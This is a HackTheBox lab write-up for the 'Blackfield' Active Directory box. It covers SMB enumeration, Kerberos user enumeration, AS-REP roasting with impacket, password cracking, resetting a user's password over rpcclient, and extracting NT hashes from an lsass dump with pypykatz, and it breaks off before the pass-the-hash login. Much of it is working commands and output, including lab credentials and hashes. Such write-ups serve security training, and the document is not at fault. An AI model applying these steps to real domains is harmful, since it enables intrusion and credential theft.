Welcome back to another machine pentesting session from HackTheBox, this time I am going to tackle the Blackfield box.

As always I start off with an Nmap scan!

sudo nmap -A -T4 10.10.10.192

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 18:16 CEST
Nmap scan report for 10.10.10.192
Host is up (0.051s latency).
Not shown: 994 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-10 23:21:30Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h04m14s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-10T23:21:51
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   50.28 ms 10.10.14.1
2   54.39 ms 10.10.10.192

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.54 seconds


I see a moderate list of open ports from the nmap scan. Lets try to enumerate with enum4linux.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ enum4linux -s /usr/share/enum4linux/share-list.txt 10.10.10.192
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jun 11 10:57:35 2020

[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
c$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
admin$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
ipc$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
enum4linux complete on Thu Jun 11 10:58:57 2020


Nothing particular to highlight, some shares, go deeper.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient -L 10.10.10.192
Enter WORKGROUP\in7rud3r's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available


Two interesting additional shares. The first on:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient //10.10.10.192/forensic
Enter WORKGROUP\in7rud3r's password: 
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> 


It seems to not be useful... for now. Try the second one:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient //10.10.10.192/profiles$
Enter WORKGROUP\in7rud3r's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  3 18:47:12 2020
  ..                                  D        0  Wed Jun  3 18:47:12 2020
  AAlleni                             D        0  Wed Jun  3 18:47:11 2020
  ABarteski                           D        0  Wed Jun  3 18:47:11 2020
  ABekesz                             D        0  Wed Jun  3 18:47:11 2020
  ABenzies                            D        0  Wed Jun  3 18:47:11 2020
[...]
  ZScozzari                           D        0  Wed Jun  3 18:47:12 2020
  ZTimofeeff                          D        0  Wed Jun  3 18:47:12 2020
  ZWausik                             D        0  Wed Jun  3 18:47:12 2020

                7846143 blocks of size 4096. 3952597 blocks available


I report only part of the list, but, trust me, it's a really huge list of users. I try to understand if there's something interesting inside the folders.

smb: \> cd AAlleni
smb: \AAlleni\> ls
  .                                   D        0  Wed Jun  3 18:47:11 2020
  ..                                  D        0  Wed Jun  3 18:47:11 2020

                7846143 blocks of size 4096. 3952597 blocks available
smb: \AAlleni\> cd ..
smb: \> cd ABarteski
smb: \ABarteski\> ls
  .                                   D        0  Wed Jun  3 18:47:11 2020
  ..                                  D        0  Wed Jun  3 18:47:11 2020

                7846143 blocks of size 4096. 3952469 blocks available
smb: \ABarteski\>


Could be all empty. To be (quite) sure that all the folder are empty I download all the content of the share on my machine and check it:

smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
smb: \> 
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb$ find . -name "*" | grep "/.*/"


This last command list all file name inside the folder, recursively; if something is on the subfolders, I'll show on the shell, but, nothing appears, so the folders are all empty. Anyway, I have a big list of users which I can use to create a file.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ cd smb/
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb$ cd ..
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ find ./smb/ -name "*" | cut -b 7- > user-list.txt


Now I need a list of password too, search from available files.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ sudo find /usr/share/ -name "*password*.txt"
[sudo] password for in7rud3r: 
Swipe your right index finger across the fingerprint reader
/usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt
/usr/share/cisco-torch/password.txt
/usr/share/setoolkit/htk-lite/commandinfo/password.txt
/usr/share/brutex/wordlists/vnc-default-passwords.txt
/usr/share/brutex/wordlists/password_weak.txt
/usr/share/brutex/wordlists/password_medium.txt
/usr/share/exploitdb-papers/papers/english/12914-mpi-and-password-cracking.txt
/usr/share/truecrack/most_common_password_10k.txt
/usr/share/doc/funkload/examples/demo/cmf/passwords.txt
/usr/share/commix/src/txt/passwords_john.txt


Ok, let me say that, I tried with a brute-force attack, but after some time I understand that the timing for this activity will be really too long, so I decide for a simplest attack.

msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > options 

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.192
rhosts => 10.10.10.192
msf5 auxiliary(scanner/smb/smb_login) > set user_as_pass true
user_as_pass => true
msf5 auxiliary(scanner/smb/smb_login) > set user_file ./user-list.txt
user_file => ./user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.192:445      - 10.10.10.192:445 - Starting SMB login bruteforce
[+] 10.10.10.192:445      - 10.10.10.192:445 - Success: '.\:' Guest
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\RVallandas:RVallandas',
[!] 10.10.10.192:445      - No active DB -- Credential data will not be saved!
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\APustulka:APustulka',
[...]
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\ATaueg:ATaueg',
[*] 10.10.10.192:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >


But nothing found. Considering that I'm on metasploit framework tool, I start to search for kerberos' exploit.

msf5 auxiliary(scanner/smb/smb_login) > search kerberos

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  auxiliary/admin/kerberos/ms14_068_kerberos_checksum  2014-11-18       normal  No     MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
   1  auxiliary/gather/get_user_spns                       2014-09-27       normal  No     Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)
   2  auxiliary/gather/kerberos_enumusers                                   normal  No     Kerberos Domain User Enumeration
   3  auxiliary/scanner/winrm/winrm_login                                   normal  No     WinRM Login Utility
   4  post/windows/escalate/golden_ticket                                   normal  No     Windows Escalate Golden Ticket


This one could be interesting.

msf5 auxiliary(scanner/smb/smb_login) > info auxiliary/gather/kerberos_enumusers

       Name: Kerberos Domain User Enumeration
     Module: auxiliary/gather/kerberos_enumusers
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Matt Byrne <attackdebris@gmail.com>

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DOMAIN                      yes       The Domain Eg: demo.local
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      88               yes       The target port
  Timeout    10               yes       The TCP timeout to establish connection and read data
  USER_FILE                   yes       Files containing usernames, one per line

Description:
  This module will enumerate valid Domain Users via Kerberos from an 
  unauthenticated perspective. It utilizes the different responses 
  returned by the service for valid and invalid users.

References:
  https://nmap.org/nsedoc/scripts/krb5-enum-users.html


Let me try.

msf5 auxiliary(scanner/smb/smb_login) > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > set domain BLACKFIELD
domain => BLACKFIELD.htb
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.192
rhosts => 10.10.10.192
msf5 auxiliary(gather/kerberos_enumusers) > set user_file user-list.txt
user_file => user-list.txt
msf5 auxiliary(gather/kerberos_enumusers) > exploit
[*] Running module against 10.10.10.192

[*] Validating options...
[*] Using domain: BLACKFIELD...
[*] 10.10.10.192:88 - Testing User: "rvallandas"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "rvallandas" does not exist
[*] 10.10.10.192:88 - Testing User: "apustulka"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "apustulka" does not exist
[...]
[*] 10.10.10.192:88 - Testing User: "audit2020"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "audit2020" is present
[...]
[*] 10.10.10.192:88 - Testing User: "svc_backup"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "svc_backup" is present
[...]
[*] 10.10.10.192:88 - Testing User: "support"...
[-] Auxiliary failed: NoMethodError undefined method `error_code' for #<Rex::Proto::Kerberos::Model::KdcResponse:0x0000561b96b38438>
[-] Call stack:
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:74:in `block in run'
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `each'
[-]   /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `run'
[*] Auxiliary module execution completed


Well, I identify some real accounts on the machine, but the execution stops on the "support" user, don't forget this, extract the final users not worked by the exploit and rerun it again to complete our original list.

msf5 auxiliary(gather/kerberos_enumusers) > exploit
[*] Running module against 10.10.10.192

[*] Validating options...
[*] Using domain: BLACKFIELD...
[*] 10.10.10.192:88 - Testing User: "gmaroufkhani"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "gmaroufkhani" does not exist
[...]
[*] 10.10.10.192:88 - Testing User: "ataueg"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "ataueg" does not exist
[*] Auxiliary module execution completed


Well, two good users (and one suspect): audit2020 and svc_backup. It should much more simple to attack with a brute-force, so I come back on the previous exploit with only these two users, but the process is too slow again. I have to search for different ways.

msf5 auxiliary(gather/kerberos_enumusers) > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS             10.10.10.192     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       true             no        Try the username as the password for all users
   USER_FILE          user-list.txt    no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/truecrack/most_common_password_10k.txt
pass_file => /usr/share/truecrack/most_common_password_10k.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_file 
user_file => user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_file ''
user_file => 
msf5 auxiliary(scanner/smb/smb_login) > set smbUser audit2020
smbUser => audit2020
msf5 auxiliary(scanner/smb/smb_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.192:445      - 10.10.10.192:445 - Starting SMB login bruteforce
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\audit2020:audit2020',
[!] 10.10.10.192:445      - No active DB -- Credential data will not be saved!
[-] 10.10.10.192:445      - 10.10.10.192:445 - Failed: '.\audit2020:password',
[...]


Another useful toolkit used for windows machine is impacket, I use it in many other machines here on HTB, it has many tools that could help you to "enumerate". I could use the smallest list with the three users (sure and doubt) that I identify in the previous step, but, I want to be sure about all the entries available to me, so, I execute the tool on all the entire list and... surprise.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/impacket/examples$ ./GetNPUsers.py -dc-ip 10.10.10.192 BLACKFIELD/ -no-pass -usersfile ../../user-list.txt 
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[-] invalid principal syntax
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD:7b456002ef8933746d6ce43ea72d7202$07cc3c311dd56116bd44ecac96cfc76d62bbbfa92a41c4579e7ddf08650e81b763eee96251f0e8b4c4c63f8f4dfc58a0cafbdda950912ee0f726247c0981232488fac2acc52179b6f1349e2baf1a5a7df442c0d22cfec12384133a9b88d585d33de25b157c39777f91f5245ae2738fe17ab386e0e313e55d0ccdad77e46093a93302631a7d8790295180d10d58bae24879b4650f20515a230a54547c17fbc5b9c55addc6caab793be4e0e3e202c006df39884a4afb13788eafe222a75563b6817501be4566ef3ea4bbf1ea4f2a9aa5f600c9e9a98f8480d1cca6f7ac94fd5e4c1d9afd11abac2a3e58259b245c2d
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)


As I understand we confirm the presence of the two users (audit2020 and svc_backup) and the support user that gave us error on the metasploit framework, providing an hash password. Ok, take the hash in the hashcat format:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/impacket/examples$ ./GetNPUsers.py -format hashcat -dc-ip 10.10.10.192 BLACKFIELD/support -no-pass
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation

[*] Getting TGT for support
$krb5asrep$23$support@BLACKFIELD:fb60c0c7175cc8a20c23b981b97dc607$3ada2343cb0398525c6edbed97e176ba6f7216924bc97f745ea3d0dbc8b6aea5bdf18cb34c3106e7783584dc8bee0900fcee6980d57bbcdb1daaa2d61e593ec3befa8fe52c79de29dbca7a9ae959f816d383502054522ad3b72c796549231ed8c7731eaaccc8f10c2bb28a075a0aa8c1019bd128867db4dd222fc22b2271f419521c34d44d982d3ed9457b6d30b687fdad7eb2b856cd97c54dce354ea71073649dad5065db90544144d96cf726ae6b35dbb026693a41af5665631c77a04894377005ff8a82fe939d1dd16bb067cf779e166d76501072918f9879beb95c6d0ea4ce480da341b21f75858ae24287c6


And use john the rip to crack the hash:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ john --wordlist=/usr/share/wordlists/rockyou.txt support.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight  ($krb5asrep$23$support@BLACKFIELD)
1g 0:00:01:02 DONE (2020-06-16 11:50) 0.01609g/s 230762p/s 230762c/s 230762C/s #00p3r..#+*=%
Use the "--show" option to display all of the cracked passwords reliably
Session completed


Nice, password of the support user seems to be "#00^BlackKnight". I try the credential and the only way I can connect with is the rpcclient command:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ rpcclient -U BLACKFIELD\\support 10.10.10.192
Enter BLACKFIELD\support's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
[...]
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]


Next step is to search a way to exploit some information through the rpcclient; searching on internet:

Infrastructure PenTest Series : Part 3 - Exploitation — tech.bitvijays.com


I can change the password of the users, good, I have to try again. On the remote machine:

rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'


It seems that we are lucky today. And on the local machine:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ net rpc password audit2020 -U support -S 10.10.10.192
Enter new password for audit2020:
Enter WORKGROUP\support's password: 


Good, again, come back on your steps and try an SMB connection with this new credential.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ smbclient -U audit2020 //10.10.10.192/forensic
Enter WORKGROUP\audit2020's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 14:03:16 2020
  ..                                  D        0  Sun Feb 23 14:03:16 2020
  commands_output                     D        0  Sun Feb 23 19:14:37 2020
  memory_analysis                     D        0  Thu May 28 22:28:33 2020
  tools                               D        0  Sun Feb 23 14:39:08 2020

                7846143 blocks of size 4096. 3667024 blocks available
smb: \> 


This time is the forensic shared folder to be accessible, fine. After a fast look at the file inside these folders, I understand that to investigate better could be fine if I download all the content on my PC and work locally. Anyway I can leave the files inside the tools folder, so, I start to download and stop it when the process starts to download that files. In fact, on the tools folder:

smb: \> cd tools\
smb: \tools\> ls
  .                                   D        0  Sun Feb 23 14:39:08 2020
  ..                                  D        0  Sun Feb 23 14:39:08 2020
  sleuthkit-4.8.0-win32               D        0  Sun Feb 23 14:39:03 2020
  sysinternals                        D        0  Sun Feb 23 14:35:25 2020
  volatility                          D        0  Sun Feb 23 14:35:39 2020

                7846143 blocks of size 4096. 4064625 blocks available
smb: \tools\> 


These tools are usually used to investigate and create reports file of the system (like ones founded in the other folders); that are clues left there on purpose? Just to understand, search the first one on google:

sleuthkit/sleuthkit
The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digi...
The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence.
The Sleuth Kit
The Sleuth Kit is a C library and collection of open source command line tools for the forensic analysis of NTFS, FAT, EXT2FS, and FFS file systems
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (2.8 KiloBytes/sec) (average 2.8 KiloBytes/sec)
[...]
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (52.7 KiloBytes/sec) (average 300.0 KiloBytes/sec)
getting file \memory_analysis\conhost.zip of size 37876530 as conhost.zip (1554.3 KiloBytes/sec) (average 1465.0 KiloBytes/sec)
[...]
getting file \memory_analysis\WmiPrvSE.zip of size 18303252 as WmiPrvSE.zip (997.3 KiloBytes/sec) (average 1285.9 KiloBytes/sec)


In the first folder seems to be a set of files exported from the logs activity of the machine and additional information about the system, I give a fast look at this, but I feel confident that nothing particular interesting could be found here, anyway, I have these files on my machine and I can come back later to understand better.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/commands_output$ ls -la
total 576
drwxr-xr-x 2 in7rud3r in7rud3r   4096 Jun 20 09:59 .
drwxr-xr-x 4 in7rud3r in7rud3r   4096 Jun 20 10:10 ..
-rw-r--r-- 1 in7rud3r in7rud3r    528 Jun 20 09:59 domain_admins.txt
-rw-r--r-- 1 in7rud3r in7rud3r    962 Jun 20 09:59 domain_groups.txt
-rw-r--r-- 1 in7rud3r in7rud3r  16454 Jun 20 09:59 domain_users.txt
-rw-r--r-- 1 in7rud3r in7rud3r 518202 Jun 20 09:59 firewall_rules.txt
-rw-r--r-- 1 in7rud3r in7rud3r   1782 Jun 20 09:59 ipconfig.txt
-rw-r--r-- 1 in7rud3r in7rud3r   3842 Jun 20 09:59 netstat.txt
-rw-r--r-- 1 in7rud3r in7rud3r   3976 Jun 20 09:59 route.txt
-rw-r--r-- 1 in7rud3r in7rud3r   4550 Jun 20 09:59 systeminfo.txt
-rw-r--r-- 1 in7rud3r in7rud3r   9990 Jun 20 09:59 tasklist.txt


In the second folder, I found something more interesting:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ zip -sf conhost.zip 
Archive contains:
  conhost.DMP
Total 1 entries (104500231 bytes)
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ zip -sf ctfmon.zip 
Archive contains:
  ctfmon.DMP
Total 1 entries (69423930 bytes)


Dump files, that some specific dump can become back to me useful? Search on internet: "exploit DMP file from windows" and

Memory Dump Analysis – Extracting Juicy Data

Great, it seems I need the lsass dump and I'm so lucky that:

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ unzip lsass.zip 
Archive:  lsass.zip
  inflating: lsass.DMP   


Now, I spent hours trying to make it work mimikatz on my machine, but... nothing. So I search an alternative on the network and I found pypykatz:

skelsec/pypykatz
Mimikatz implementation in pure Python. Contribute to skelsec/pypykatz development by creating an account on GitHub.


And let me say, it works really well.

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ pypykatz lsa -o dmp-lsass-analisys.txt minidump lsass.DMP 
INFO:root:Parsing file lsass.DMP

FILE: ======== lsass.DMP =======
[...]
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
	== MSV ==
		Username: Administrator
		Domain: BLACKFIELD
		LM: NA
		NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
		SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
	== WDIGEST [25869]==
		username Administrator
		domainname BLACKFIELD
		password None
	== SSP [25869]==
		username 
		domainname 
		password None
	== Kerberos ==
		Username: Administrator
		Domain: BLACKFIELD.LOCAL
		Password: None
	== WDIGEST [25869]==
		username Administrator
		domainname BLACKFIELD
		password None
	== DPAPI [25869]==
		luid 153705
		key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
		masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
		sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
[...]
== LogonSession ==
authentication_id 406499 (633e3)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406499
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
	== WDIGEST [633e3]==
		username svc_backup
		domainname BLACKFIELD
		password None
	== Kerberos ==
		Username: svc_backup
		Domain: BLACKFIELD.LOCAL
		Password: None
	== WDIGEST [633e3]==
		username svc_backup
		domainname BLACKFIELD
		password None
	== DPAPI [633e3]==
		luid 406499
		key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
		masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
		sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991


The output is really long, so I extract the interesting parts. These interesting parts are the HASH coding of the password for the svc_backup user and the administrator. If you remember one of my past writeup (I hope to have already published, depend by the retirement order of the machine from HTB), we have the possibility to use the HASH code instead of the password on the Evil-WinRM tool that we are going to use, to connect to the remote machine and have available a shell on it. Obviously, I try with the Administrator's HASH for first:

